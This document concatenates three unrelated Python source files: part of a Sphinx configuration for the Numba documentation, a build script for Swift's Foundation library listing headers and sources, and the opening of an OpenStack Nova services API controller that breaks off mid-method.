# 'logo_only': False,
# 'display_version': True,
# 'prev_next_buttons_location': 'bottom',
'style_external_links': True,
# 'vcs_pageview_mode': '',
'style_nav_header_background': '#00A3E0',
# Toc options
'collapse_navigation': False,
# 'sticky_navigation': True,
# 'navigation_depth': 4,
# 'includehidden': True,
# 'titles_only': False
}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = None
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "../_static/numba-white-icon-rgb.svg"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '../_static/numba-blue-icon-rgb.svg'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['../_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Numbadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'numba.tex', u'Numba Documentation',
u'Anaconda', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'numba', 'Numba Documentation',
['Anaconda'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Numba', 'Numba Documentation',
'Anaconda', 'Numba', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Configuration for intersphinx: refer to the Python standard library
# and the Numpy documentation.
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('http://docs.scipy.org/doc/numpy', None),
'llvmlite': ('http://llvmlite.pydata.org/en/latest/', None),
}
# numpydoc options
# To silence "WARNING: toctree contains reference to nonexisting document"
numpydoc_show_class_members = False
# -- Custom autogeneration ------------------------------------------------
def _autogenerate():
from numba.scripts.generate_lower_listing import gen_lower_listing
from numba.misc.help.inspector import write_listings
basedir = os.path.dirname(__file__)
gen_lower_listing(os.path.join(basedir,
'developer/autogen_lower_listing.rst'))
# Run inspector on supported packages
for package in ['builtins', 'math', 'cmath', 'numpy']:
write_listings(
package_name=package,
filename=os.path.join(
basedir, 'developer', 'autogen_{}_listing'.format(package),
),
output_format='rst',
)
_autogenerate()
def setup(app):
app.add_css_file('rtd-overrides.css')
| |
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2015 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See http://swift.org/LICENSE.txt for license information
# See http://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
script = Script()
foundation = DynamicLibrary("Foundation")
foundation.GCC_PREFIX_HEADER = 'CoreFoundation/Base.subproj/CoreFoundation_Prefix.h'
if Configuration.current.target.sdk == OSType.Linux:
foundation.CFLAGS = '-DDEPLOYMENT_TARGET_LINUX -D_GNU_SOURCE '
foundation.LDFLAGS = '${SWIFT_USE_LINKER} -Wl,@./CoreFoundation/linux.ld -lswiftGlibc `icu-config --ldflags` -Wl,-defsym,__CFConstantStringClassReference=_TMC10Foundation19_NSCFConstantString -Wl,-Bsymbolic '
elif Configuration.current.target.sdk == OSType.FreeBSD:
foundation.CFLAGS = '-DDEPLOYMENT_TARGET_FREEBSD -I/usr/local/include -I/usr/local/include/libxml2 '
foundation.LDFLAGS = ''
elif Configuration.current.target.sdk == OSType.MacOSX:
foundation.CFLAGS = '-DDEPLOYMENT_TARGET_MACOSX '
foundation.LDFLAGS = '-licucore -twolevel_namespace -Wl,-alias_list,CoreFoundation/Base.subproj/DarwinSymbolAliases -sectcreate __UNICODE __csbitmaps CoreFoundation/CharacterSets/CFCharacterSetBitmaps.bitmap -sectcreate __UNICODE __properties CoreFoundation/CharacterSets/CFUniCharPropertyDatabase.data -sectcreate __UNICODE __data CoreFoundation/CharacterSets/CFUnicodeData-L.mapping -segprot __UNICODE r r '
if Configuration.current.build_mode == Configuration.Debug:
foundation.LDFLAGS += ' -lswiftSwiftOnoneSupport '
# For now, we do not distinguish between public and private headers (they are all private to Foundation)
# These are really part of CF, which should ultimately be a separate target
foundation.ROOT_HEADERS_FOLDER_PATH = "${PREFIX}/lib/swift"
foundation.PUBLIC_HEADERS_FOLDER_PATH = "${PREFIX}/lib/swift/CoreFoundation"
foundation.PRIVATE_HEADERS_FOLDER_PATH = "${PREFIX}/lib/swift/CoreFoundation"
foundation.PROJECT_HEADERS_FOLDER_PATH = "${PREFIX}/lib/swift/CoreFoundation"
foundation.PUBLIC_MODULE_FOLDER_PATH = "${PREFIX}/lib/swift/CoreFoundation"
foundation.CFLAGS += " ".join([
'-DU_SHOW_DRAFT_API',
'-DCF_BUILDING_CF',
'-DDEPLOYMENT_RUNTIME_SWIFT',
'-fconstant-cfstrings',
'-fexceptions',
'-Wno-shorten-64-to-32',
'-Wno-deprecated-declarations',
'-Wno-unreachable-code',
'-Wno-conditional-uninitialized',
'-Wno-unused-variable',
'-Wno-int-conversion',
'-Wno-unused-function',
'-I/usr/include/libxml2',
'-I./',
])
swift_cflags = [
'-I${BUILD_DIR}/Foundation/usr/lib/swift',
'-I/usr/include/libxml2'
]
if "XCTEST_BUILD_DIR" in Configuration.current.variables:
swift_cflags += [
'-I${XCTEST_BUILD_DIR}',
'-L${XCTEST_BUILD_DIR}',
'-I/usr/include/libxml2'
]
# Configure use of Dispatch in CoreFoundation and Foundation if libdispatch is being built
#if "LIBDISPATCH_SOURCE_DIR" in Configuration.current.variables:
# foundation.CFLAGS += " "+" ".join([
# '-DDEPLOYMENT_ENABLE_LIBDISPATCH',
# '-I'+Configuration.current.variables["LIBDISPATCH_SOURCE_DIR"],
# '-I'+Configuration.current.variables["LIBDISPATCH_BUILD_DIR"]+'/tests' # for include of dispatch/private.h in CF
# ])
# swift_cflags += ([
# '-DDEPLOYMENT_ENABLE_LIBDISPATCH',
# '-I'+Configuration.current.variables["LIBDISPATCH_SOURCE_DIR"],
# '-I'+Configuration.current.variables["LIBDISPATCH_BUILD_DIR"]+'/src'
# ])
# foundation.LDFLAGS += '-ldispatch -L'+Configuration.current.variables["LIBDISPATCH_BUILD_DIR"]+'/src/.libs '
foundation.SWIFTCFLAGS = " ".join(swift_cflags)
foundation.LDFLAGS += '-lpthread -ldl -lm -lswiftCore -lxml2 '
if "XCTEST_BUILD_DIR" in Configuration.current.variables:
foundation.LDFLAGS += '-L${XCTEST_BUILD_DIR}'
headers = CopyHeaders(
module = 'CoreFoundation/Base.subproj/linux.modulemap',
public = [
'CoreFoundation/Stream.subproj/CFStream.h',
'CoreFoundation/String.subproj/CFStringEncodingExt.h',
'CoreFoundation/Base.subproj/SwiftRuntime/CoreFoundation.h',
'CoreFoundation/Base.subproj/SwiftRuntime/TargetConditionals.h',
'CoreFoundation/RunLoop.subproj/CFMessagePort.h',
'CoreFoundation/Collections.subproj/CFBinaryHeap.h',
'CoreFoundation/PlugIn.subproj/CFBundle.h',
'CoreFoundation/Locale.subproj/CFCalendar.h',
'CoreFoundation/Collections.subproj/CFBitVector.h',
'CoreFoundation/Base.subproj/CFAvailability.h',
'CoreFoundation/Collections.subproj/CFTree.h',
'CoreFoundation/NumberDate.subproj/CFTimeZone.h',
'CoreFoundation/Error.subproj/CFError.h',
'CoreFoundation/Collections.subproj/CFBag.h',
'CoreFoundation/PlugIn.subproj/CFPlugIn.h',
'CoreFoundation/Parsing.subproj/CFXMLParser.h',
'CoreFoundation/String.subproj/CFString.h',
'CoreFoundation/Collections.subproj/CFSet.h',
'CoreFoundation/Base.subproj/CFUUID.h',
'CoreFoundation/NumberDate.subproj/CFDate.h',
'CoreFoundation/Collections.subproj/CFDictionary.h',
'CoreFoundation/Base.subproj/CFByteOrder.h',
'CoreFoundation/AppServices.subproj/CFUserNotification.h',
'CoreFoundation/Base.subproj/CFBase.h',
'CoreFoundation/Preferences.subproj/CFPreferences.h',
'CoreFoundation/Locale.subproj/CFLocale.h',
'CoreFoundation/RunLoop.subproj/CFSocket.h',
'CoreFoundation/Parsing.subproj/CFPropertyList.h',
'CoreFoundation/Collections.subproj/CFArray.h',
'CoreFoundation/RunLoop.subproj/CFRunLoop.h',
'CoreFoundation/URL.subproj/CFURLAccess.h',
'CoreFoundation/Locale.subproj/CFDateFormatter.h',
'CoreFoundation/RunLoop.subproj/CFMachPort.h',
'CoreFoundation/PlugIn.subproj/CFPlugInCOM.h',
'CoreFoundation/Base.subproj/CFUtilities.h',
'CoreFoundation/Parsing.subproj/CFXMLNode.h',
'CoreFoundation/URL.subproj/CFURLComponents.h',
'CoreFoundation/URL.subproj/CFURL.h',
'CoreFoundation/Locale.subproj/CFNumberFormatter.h',
'CoreFoundation/String.subproj/CFCharacterSet.h',
'CoreFoundation/NumberDate.subproj/CFNumber.h',
'CoreFoundation/Collections.subproj/CFData.h',
'CoreFoundation/String.subproj/CFAttributedString.h',
],
private = [
'CoreFoundation/Base.subproj/ForSwiftFoundationOnly.h',
'CoreFoundation/Base.subproj/ForFoundationOnly.h',
'CoreFoundation/String.subproj/CFBurstTrie.h',
'CoreFoundation/Error.subproj/CFError_Private.h',
'CoreFoundation/URL.subproj/CFURLPriv.h',
'CoreFoundation/Base.subproj/CFLogUtilities.h',
'CoreFoundation/PlugIn.subproj/CFBundlePriv.h',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingConverter.h',
'CoreFoundation/Stream.subproj/CFStreamAbstract.h',
'CoreFoundation/Base.subproj/CFInternal.h',
'CoreFoundation/Parsing.subproj/CFXMLInputStream.h',
'CoreFoundation/Parsing.subproj/CFXMLInterface.h',
'CoreFoundation/PlugIn.subproj/CFPlugIn_Factory.h',
'CoreFoundation/String.subproj/CFStringLocalizedFormattingInternal.h',
'CoreFoundation/PlugIn.subproj/CFBundle_Internal.h',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingConverterPriv.h',
'CoreFoundation/Collections.subproj/CFBasicHash.h',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingDatabase.h',
'CoreFoundation/StringEncodings.subproj/CFUnicodeDecomposition.h',
'CoreFoundation/Stream.subproj/CFStreamInternal.h',
'CoreFoundation/PlugIn.subproj/CFBundle_BinaryTypes.h',
'CoreFoundation/Locale.subproj/CFICULogging.h',
'CoreFoundation/Locale.subproj/CFLocaleInternal.h',
'CoreFoundation/StringEncodings.subproj/CFUnicodePrecomposition.h',
'CoreFoundation/Base.subproj/CFPriv.h',
'CoreFoundation/StringEncodings.subproj/CFUniCharPriv.h',
'CoreFoundation/URL.subproj/CFURL.inc.h',
'CoreFoundation/NumberDate.subproj/CFBigNumber.h',
'CoreFoundation/StringEncodings.subproj/CFUniChar.h',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingConverterExt.h',
'CoreFoundation/Collections.subproj/CFStorage.h',
'CoreFoundation/Base.subproj/CFRuntime.h',
'CoreFoundation/String.subproj/CFStringDefaultEncoding.h',
'CoreFoundation/String.subproj/CFCharacterSetPriv.h',
'CoreFoundation/Stream.subproj/CFStreamPriv.h',
'CoreFoundation/StringEncodings.subproj/CFICUConverters.h',
'CoreFoundation/String.subproj/CFRegularExpression.h',
'CoreFoundation/String.subproj/CFRunArray.h',
],
project = [
])
foundation.add_phase(headers)
sources = CompileSources([
'closure/data.c',
'closure/runtime.c',
'uuid/uuid.c',
# 'CoreFoundation/AppServices.subproj/CFUserNotification.c',
'CoreFoundation/Base.subproj/CFBase.c',
'CoreFoundation/Base.subproj/CFFileUtilities.c',
'CoreFoundation/Base.subproj/CFPlatform.c',
'CoreFoundation/Base.subproj/CFRuntime.c',
'CoreFoundation/Base.subproj/CFSortFunctions.c',
'CoreFoundation/Base.subproj/CFSystemDirectories.c',
'CoreFoundation/Base.subproj/CFUtilities.c',
'CoreFoundation/Base.subproj/CFUUID.c',
'CoreFoundation/Collections.subproj/CFArray.c',
'CoreFoundation/Collections.subproj/CFBag.c',
'CoreFoundation/Collections.subproj/CFBasicHash.c',
'CoreFoundation/Collections.subproj/CFBinaryHeap.c',
'CoreFoundation/Collections.subproj/CFBitVector.c',
'CoreFoundation/Collections.subproj/CFData.c',
'CoreFoundation/Collections.subproj/CFDictionary.c',
'CoreFoundation/Collections.subproj/CFSet.c',
'CoreFoundation/Collections.subproj/CFStorage.c',
'CoreFoundation/Collections.subproj/CFTree.c',
'CoreFoundation/Error.subproj/CFError.c',
'CoreFoundation/Locale.subproj/CFCalendar.c',
'CoreFoundation/Locale.subproj/CFDateFormatter.c',
'CoreFoundation/Locale.subproj/CFLocale.c',
'CoreFoundation/Locale.subproj/CFLocaleIdentifier.c',
'CoreFoundation/Locale.subproj/CFLocaleKeys.c',
'CoreFoundation/Locale.subproj/CFNumberFormatter.c',
'CoreFoundation/NumberDate.subproj/CFBigNumber.c',
'CoreFoundation/NumberDate.subproj/CFDate.c',
'CoreFoundation/NumberDate.subproj/CFNumber.c',
'CoreFoundation/NumberDate.subproj/CFTimeZone.c',
'CoreFoundation/Parsing.subproj/CFBinaryPList.c',
'CoreFoundation/Parsing.subproj/CFOldStylePList.c',
'CoreFoundation/Parsing.subproj/CFPropertyList.c',
'CoreFoundation/Parsing.subproj/CFXMLInputStream.c',
'CoreFoundation/Parsing.subproj/CFXMLNode.c',
'CoreFoundation/Parsing.subproj/CFXMLParser.c',
'CoreFoundation/Parsing.subproj/CFXMLTree.c',
'CoreFoundation/Parsing.subproj/CFXMLInterface.c',
'CoreFoundation/PlugIn.subproj/CFBundle.c',
'CoreFoundation/PlugIn.subproj/CFBundle_Binary.c',
'CoreFoundation/PlugIn.subproj/CFBundle_Grok.c',
'CoreFoundation/PlugIn.subproj/CFBundle_InfoPlist.c',
'CoreFoundation/PlugIn.subproj/CFBundle_Locale.c',
'CoreFoundation/PlugIn.subproj/CFBundle_Resources.c',
'CoreFoundation/PlugIn.subproj/CFBundle_Strings.c',
'CoreFoundation/PlugIn.subproj/CFPlugIn.c',
'CoreFoundation/PlugIn.subproj/CFPlugIn_Factory.c',
'CoreFoundation/PlugIn.subproj/CFPlugIn_Instance.c',
'CoreFoundation/PlugIn.subproj/CFPlugIn_PlugIn.c',
'CoreFoundation/Preferences.subproj/CFApplicationPreferences.c',
'CoreFoundation/Preferences.subproj/CFPreferences.c',
# 'CoreFoundation/RunLoop.subproj/CFMachPort.c',
# 'CoreFoundation/RunLoop.subproj/CFMessagePort.c',
'CoreFoundation/RunLoop.subproj/CFRunLoop.c',
'CoreFoundation/RunLoop.subproj/CFSocket.c',
'CoreFoundation/Stream.subproj/CFConcreteStreams.c',
'CoreFoundation/Stream.subproj/CFSocketStream.c',
'CoreFoundation/Stream.subproj/CFStream.c',
'CoreFoundation/String.subproj/CFBurstTrie.c',
'CoreFoundation/String.subproj/CFCharacterSet.c',
'CoreFoundation/String.subproj/CFString.c',
'CoreFoundation/String.subproj/CFStringEncodings.c',
'CoreFoundation/String.subproj/CFStringScanner.c',
'CoreFoundation/String.subproj/CFStringUtilities.c',
'CoreFoundation/String.subproj/CFStringTransform.c',
'CoreFoundation/StringEncodings.subproj/CFBuiltinConverters.c',
'CoreFoundation/StringEncodings.subproj/CFICUConverters.c',
'CoreFoundation/StringEncodings.subproj/CFPlatformConverters.c',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingConverter.c',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingDatabase.c',
'CoreFoundation/StringEncodings.subproj/CFUniChar.c',
'CoreFoundation/StringEncodings.subproj/CFUnicodeDecomposition.c',
'CoreFoundation/StringEncodings.subproj/CFUnicodePrecomposition.c',
'CoreFoundation/URL.subproj/CFURL.c',
'CoreFoundation/URL.subproj/CFURLAccess.c',
'CoreFoundation/URL.subproj/CFURLComponents.c',
'CoreFoundation/URL.subproj/CFURLComponents_URIParser.c',
'CoreFoundation/String.subproj/CFCharacterSetData.S',
'CoreFoundation/String.subproj/CFUnicodeDataL.S',
'CoreFoundation/String.subproj/CFUniCharPropertyDatabase.S',
'CoreFoundation/String.subproj/CFRegularExpression.c',
'CoreFoundation/String.subproj/CFAttributedString.c',
'CoreFoundation/String.subproj/CFRunArray.c',
])
sources.add_dependency(headers)
foundation.add_phase(sources)
swift_sources = CompileSwiftSources([
'Foundation/NSObject.swift',
'Foundation/NSAffineTransform.swift',
'Foundation/NSArray.swift',
'Foundation/NSAttributedString.swift',
'Foundation/NSBundle.swift',
'Foundation/NSByteCountFormatter.swift',
'Foundation/NSCache.swift',
'Foundation/NSCalendar.swift',
'Foundation/NSCFArray.swift',
'Foundation/NSCFDictionary.swift',
'Foundation/NSCFSet.swift',
'Foundation/NSCFString.swift',
'Foundation/NSCharacterSet.swift',
'Foundation/NSCoder.swift',
'Foundation/NSComparisonPredicate.swift',
'Foundation/NSCompoundPredicate.swift',
'Foundation/NSConcreteValue.swift',
'Foundation/NSData.swift',
'Foundation/NSDate.swift',
'Foundation/NSDateComponentsFormatter.swift',
'Foundation/NSDateFormatter.swift',
'Foundation/NSDateIntervalFormatter.swift',
'Foundation/NSDecimal.swift',
'Foundation/NSDecimalNumber.swift',
'Foundation/NSDictionary.swift',
'Foundation/NSEnergyFormatter.swift',
'Foundation/NSEnumerator.swift',
'Foundation/NSError.swift',
'Foundation/NSExpression.swift',
'Foundation/NSFileHandle.swift',
'Foundation/NSFileManager.swift',
'Foundation/NSFormatter.swift',
'Foundation/NSGeometry.swift',
'Foundation/NSHost.swift',
'Foundation/NSHTTPCookie.swift',
'Foundation/NSHTTPCookieStorage.swift',
'Foundation/NSIndexPath.swift',
'Foundation/NSIndexSet.swift',
'Foundation/NSJSONSerialization.swift',
'Foundation/NSKeyedCoderOldStyleArray.swift',
'Foundation/NSKeyedArchiver.swift',
'Foundation/NSKeyedUnarchiver.swift',
'Foundation/NSLengthFormatter.swift',
'Foundation/NSLocale.swift',
'Foundation/NSLock.swift',
'Foundation/NSLog.swift',
'Foundation/NSMassFormatter.swift',
'Foundation/NSNotification.swift',
'Foundation/NSNotificationQueue.swift',
'Foundation/NSNull.swift',
'Foundation/NSNumber.swift',
'Foundation/NSNumberFormatter.swift',
'Foundation/NSObjCRuntime.swift',
'Foundation/NSOperation.swift',
'Foundation/NSOrderedSet.swift',
'Foundation/NSPathUtilities.swift',
'Foundation/NSPersonNameComponents.swift',
'Foundation/NSPersonNameComponentsFormatter.swift',
'Foundation/NSPort.swift',
'Foundation/NSPortMessage.swift',
'Foundation/NSPredicate.swift',
'Foundation/NSProcessInfo.swift',
'Foundation/NSProgress.swift',
'Foundation/NSPropertyList.swift',
'Foundation/NSRange.swift',
'Foundation/NSRegularExpression.swift',
'Foundation/NSRunLoop.swift',
'Foundation/NSScanner.swift',
'Foundation/NSSet.swift',
'Foundation/NSSortDescriptor.swift',
'Foundation/NSSpecialValue.swift',
'Foundation/NSStream.swift',
'Foundation/NSString.swift',
'Foundation/String.swift',
'Foundation/NSSwiftRuntime.swift',
'Foundation/NSTask.swift',
'Foundation/NSTextCheckingResult.swift',
'Foundation/NSThread.swift',
'Foundation/NSTimer.swift',
'Foundation/NSTimeZone.swift',
'Foundation/NSURL.swift',
'Foundation/NSURLAuthenticationChallenge.swift',
'Foundation/NSURLCache.swift',
'Foundation/NSURLCredential.swift',
'Foundation/NSURLCredentialStorage.swift',
'Foundation/NSURLError.swift',
'Foundation/NSURLProtectionSpace.swift',
'Foundation/NSURLProtocol.swift',
'Foundation/NSURLRequest.swift',
'Foundation/NSURLResponse.swift',
'Foundation/NSURLSession.swift',
'Foundation/NSUserDefaults.swift',
'Foundation/NSUUID.swift',
'Foundation/NSValue.swift',
'Foundation/NSXMLDocument.swift',
'Foundation/NSXMLDTD.swift',
'Foundation/NSXMLDTDNode.swift',
'Foundation/NSXMLElement.swift',
'Foundation/NSXMLNode.swift',
'Foundation/NSXMLNodeOptions.swift',
'Foundation/NSXMLParser.swift',
'Foundation/FoundationErrors.swift',
])
swift_sources.add_dependency(headers)
foundation.add_phase(swift_sources)
foundation_tests_resources = CopyResources('TestFoundation', [
'TestFoundation/Resources/Info.plist',
'TestFoundation/Resources/NSURLTestData.plist',
'TestFoundation/Resources/Test.plist',
'TestFoundation/Resources/NSStringTestData.txt',
'TestFoundation/Resources/NSXMLDocumentTestData.xml',
'TestFoundation/Resources/PropertyList-1.0.dtd',
'TestFoundation/Resources/NSXMLDTDTestData.xml',
'TestFoundation/Resources/NSKeyedUnarchiver-ArrayTest.plist',
'TestFoundation/Resources/NSKeyedUnarchiver-ComplexTest.plist',
'TestFoundation/Resources/NSKeyedUnarchiver-ConcreteValueTest.plist',
'TestFoundation/Resources/NSKeyedUnarchiver-EdgeInsetsTest.plist',
'TestFoundation/Resources/NSKeyedUnarchiver-NotificationTest.plist',
'TestFoundation/Resources/NSKeyedUnarchiver-RangeTest.plist',
'TestFoundation/Resources/NSKeyedUnarchiver-RectTest.plist',
'TestFoundation/Resources/NSKeyedUnarchiver-URLTest.plist',
'TestFoundation/Resources/NSKeyedUnarchiver-UUIDTest.plist',
'TestFoundation/Resources/NSKeyedUnarchiver-OrderedSetTest.plist',
])
# TODO: Probably this should be another 'product', but for now it's simply a phase
foundation_tests = SwiftExecutable('TestFoundation', [
'TestFoundation/main.swift',
] + glob.glob('./TestFoundation/Test*.swift')) # all TestSomething.swift are considered sources to the test project in the TestFoundation directory
foundation_tests.add_dependency(foundation_tests_resources)
foundation.add_phase(foundation_tests_resources)
foundation.add_phase(foundation_tests)
plutil = SwiftExecutable('plutil', ['Tools/plutil/main.swift'])
foundation.add_phase(plutil)
script.add_product(foundation)
extra_script = """
rule InstallFoundation
command = mkdir -p "${DSTROOT}/${PREFIX}/lib/swift/${OS}"; $
cp "${BUILD_DIR}/Foundation/${DYLIB_PREFIX}Foundation${DYLIB_SUFFIX}" "${DSTROOT}/${PREFIX}/lib/swift/${OS}"; $
mkdir -p "${DSTROOT}/${PREFIX}/lib/swift/${OS}/${ARCH}"; $
cp "${BUILD_DIR}/Foundation/Foundation.swiftmodule" "${DSTROOT}/${PREFIX}/lib/swift/${OS}/${ARCH}/"; $
cp "${BUILD_DIR}/Foundation/Foundation.swiftdoc" "${DSTROOT}/${PREFIX}/lib/swift/${OS}/${ARCH}/"; $
mkdir -p "${DSTROOT}/${PREFIX}/local/include"; $
rsync -r "${BUILD_DIR}/Foundation/${PREFIX}/lib/swift/CoreFoundation" "${DSTROOT}/${PREFIX}/lib/swift/"
build ${BUILD_DIR}/.install: InstallFoundation ${BUILD_DIR}/Foundation/${DYLIB_PREFIX}Foundation${DYLIB_SUFFIX}
build install: phony | ${BUILD_DIR}/.install
"""
if "XCTEST_BUILD_DIR" in Configuration.current.variables:
extra_script += """
rule RunTestFoundation
command = echo "**** RUNNING TESTS ****\\nexecute:\\nLD_LIBRARY_PATH=${BUILD_DIR}/Foundation/:${XCTEST_BUILD_DIR} ${BUILD_DIR}/TestFoundation/TestFoundation\\n**** DEBUGGING TESTS ****\\nexecute:\\nLD_LIBRARY_PATH=${BUILD_DIR}/Foundation/:${XCTEST_BUILD_DIR} lldb ${BUILD_DIR}/TestFoundation/TestFoundation\\n"
description = Building Tests
build ${BUILD_DIR}/.test: RunTestFoundation | TestFoundation
build test: phony | ${BUILD_DIR}/.test
"""
else:
extra_script += """
rule RunTestFoundation
command = echo "**** RUNNING TESTS ****\\nexecute:\\nLD_LIBRARY_PATH=${BUILD_DIR}/Foundation/ ${BUILD_DIR}/TestFoundation/TestFoundation\\n**** DEBUGGING TESTS ****\\nexecute:\\nLD_LIBRARY_PATH=${BUILD_DIR}/Foundation/ lldb ${BUILD_DIR}/TestFoundation/TestFoundation\\n"
description = Building Tests
build ${BUILD_DIR}/.test: RunTestFoundation | TestFoundation
build test: phony | ${BUILD_DIR}/.test
"""
script.add_text(extra_script)
script.generate()
| |
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import strutils
from oslo_utils import uuidutils
import webob.exc
from nova.api.openstack import api_version_request
from nova.api.openstack.compute.schemas import services
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova import availability_zones
from nova import compute
from nova import exception
from nova.i18n import _
from nova.policies import services as services_policies
from nova import servicegroup
from nova import utils
UUID_FOR_ID_MIN_VERSION = '2.53'
class ServiceController(wsgi.Controller):
def __init__(self):
self.host_api = compute.HostAPI()
self.aggregate_api = compute.api.AggregateAPI()
self.servicegroup_api = servicegroup.API()
self.actions = {"enable": self._enable,
"disable": self._disable,
"disable-log-reason": self._disable_log_reason}
def _get_services(self, req):
# The API services are filtered out since they are not RPC services
# and therefore their state is not reported through the service group
# API, so they would always be reported as 'down' (see bug 1543625).
api_services = ('nova-osapi_compute', 'nova-ec2', 'nova-metadata')
context = req.environ['nova.context']
context.can(services_policies.BASE_POLICY_NAME)
_services = [
s
for s in self.host_api.service_get_all(context, set_zones=True,
all_cells=True)
if s['binary'] not in api_services
]
host = ''
if 'host' in req.GET:
host = req.GET['host']
binary = ''
if 'binary' in req.GET:
binary = req.GET['binary']
if host:
_services = [s for s in _services if s['host'] == host]
if binary:
_services = [s for s in _services if s['binary'] == binary]
return _services
def _get_service_detail(self, svc, additional_fields, req):
alive = self.servicegroup_api.service_is_up(svc)
state = (alive and "up") or "down"
active = 'enabled'
if svc['disabled']:
active = 'disabled'
updated_time = self.servicegroup_api.get_updated_time(svc)
uuid_for_id = api_version_request.is_supported(
req, min_version=UUID_FOR_ID_MIN_VERSION)
if 'availability_zone' not in svc:
# The service wasn't loaded with the AZ so we need to do it here.
# Yes this looks weird, but set_availability_zones makes a copy of
# the list passed in and mutates the objects within it, so we have
# to pull it back out from the resulting copied list.
svc.availability_zone = (
availability_zones.set_availability_zones(
req.environ['nova.context'],
[svc])[0]['availability_zone'])
service_detail = {'binary': svc['binary'],
'host': svc['host'],
'id': svc['uuid' if uuid_for_id else 'id'],
'zone': svc['availability_zone'],
'status': active,
'state': state,
'updated_at': updated_time,
'disabled_reason': svc['disabled_reason']}
for field in additional_fields:
service_detail[field] = svc[field]
return service_detail
def _get_services_list(self, req, additional_fields=()):
_services = self._get_services(req)
return [self._get_service_detail(svc, additional_fields, req)
for svc in _services]
def _enable(self, body, context):
"""Enable scheduling for a service."""
return self._enable_disable(body, context, "enabled",
{'disabled': False,
'disabled_reason': None})
def _disable(self, body, context, reason=None):
"""Disable scheduling for a service with optional log."""
return self._enable_disable(body, context, "disabled",
{'disabled': True,
'disabled_reason': reason})
def _disable_log_reason(self, body, context):
"""Disable scheduling for a service with a log."""
try:
reason = body['disabled_reason']
except KeyError:
msg = _('Missing disabled reason field')
raise webob.exc.HTTPBadRequest(explanation=msg)
return self._disable(body, context, reason)
def _enable_disable(self, body, context, status, params_to_update):
"""Enable/Disable scheduling for a service."""
reason = params_to_update.get('disabled_reason')
ret_value = {
'service': {
'host': body['host'],
'binary': body['binary'],
'status': status
},
}
if reason:
ret_value['service']['disabled_reason'] = reason
self._update(context, body['host'], body['binary'], params_to_update)
return ret_value
def _forced_down(self, body, context):
"""Set or unset forced_down flag for the service"""
try:
forced_down = strutils.bool_from_string(body["forced_down"])
except KeyError:
msg = _('Missing forced_down field')
